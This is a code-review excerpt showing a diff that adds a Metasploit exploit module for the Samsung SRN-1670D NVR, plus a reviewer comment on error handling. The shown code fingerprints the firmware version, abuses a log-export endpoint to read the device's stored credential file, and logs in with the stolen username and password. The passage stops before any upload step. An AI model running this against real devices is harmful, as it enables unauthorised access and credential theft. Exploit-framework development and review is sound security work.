modules/exploits/linux/http/samsung_srv_1670d_upload_exec.rb

```diff
@@ -0,0 +1,241 @@
+	        ],
+	      'Privileged'     => true,
+	      'Arch'           => ARCH_PHP,
+	      'Platform'       => 'php',
+	      'Targets'        =>
+	        [
+			['Samsung SRN-1670D == 1.0.0.193', {}]
+	        ],
+	      'DefaultTarget'  => 0,
+	      'DisclosureDate' => 'Mar 14 2017'
+	    ))
+
+	    register_options(
+	      [
+	        OptString.new('RHOST', [ true, 'The target address.' ]),
+		OptString.new('RPORT', [ true, 'The target port (TCP).', '80' ]),
+	      ])
+	end
+
+
+	def check
+		#
+		print_status('Checking version...') 
+
+	 	resp = send_request_cgi({
+			'uri'     =>  "/index",
+			'version' => '1.1',
+			'method' => 'GET',
+			'headers' =>
+				{
+				   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
+				}
+	        })
+	    
+		unless resp
+			print_error("Connection timed out.")
+			return Exploit::CheckCode::Unknown
+		end
+		#        <!---------------------------------   File Version 1.0.0.193   --------------------------------->
+		version = nil
+		if resp and resp.code == 200  and resp.body.match(/Web Viewer for Samsung NVR/)
+				if resp.body =~ /File Version (\d+\.\d+\.\d+\.\d+)/
+					version = $1
+					if version == '1.0.0.193'
+						print_good "Found vesrion: #{version}"
+						return Exploit::CheckCode::Appears
+					end
+				end
+		end
+
+		Exploit::CheckCode::Safe
+
+	end
+
+  	def exploit
+
+	 
+		print_status('Obtaining credentails...') 
+	 
+	 	resp = send_request_cgi({
+			'uri'     =>  "/cslog_export.php",
+			'version' => '1.1',
+			'method' => 'GET',
+			'vars_get'=>
+				{
+				'path' => '/root/php_modules/lighttpd/sbin/userpw',
+				'file' => 'foo'
+				},
+			'headers' =>
+				{
+				   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
+				}
+	        })
+		
+		unless resp
+			print_error("Connection timed out.")
+			return Exploit::CheckCode::Unknown
+		end
+
+		if resp and resp.code == 200 and resp.body !~ /Authentication is failed/ and resp.body !~ /File not found/
+			username =  resp.body.split(':')[0]
+			password =  resp.body.split(':')[1].gsub("\n",'')
+			print_good "Credentials obtained successfully: #{username}:#{password}"
+				
+
+				data1 = Rex::Text.encode_base64("#{username}")
+				data2 = Digest::SHA256.hexdigest("#{password}")
+
+				randfloat  = Random.new
+				data3 =  randfloat.rand(0.9)
+				data4 = data3
+
+				print_status('Logging...') 
+
+			 	resp = send_request_cgi({
+					'uri'     =>  "/login",
+					'version' => '1.1',
+					'method' => 'POST',
+					'vars_post'=>
+						{
+							'data1' => data1,
+							'data2' => data2,
+							'data3' => data3,
+							'data4' => data4
+						},
+					'headers' =>
+						{
+						   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
+						   'DNT' => "1",
+						   'Cookie' => "IESEVEN=1"
+						}
+				})
+
+				unless resp
+					print_error("Connection timed out.")
+					return Exploit::CheckCode::Unknown
```

Comment:
`Exploit::CheckCode::*` is reserved for `check` methods. Use `fail_with` instead.

`fail_with` `Failure::Unreachable` in this instance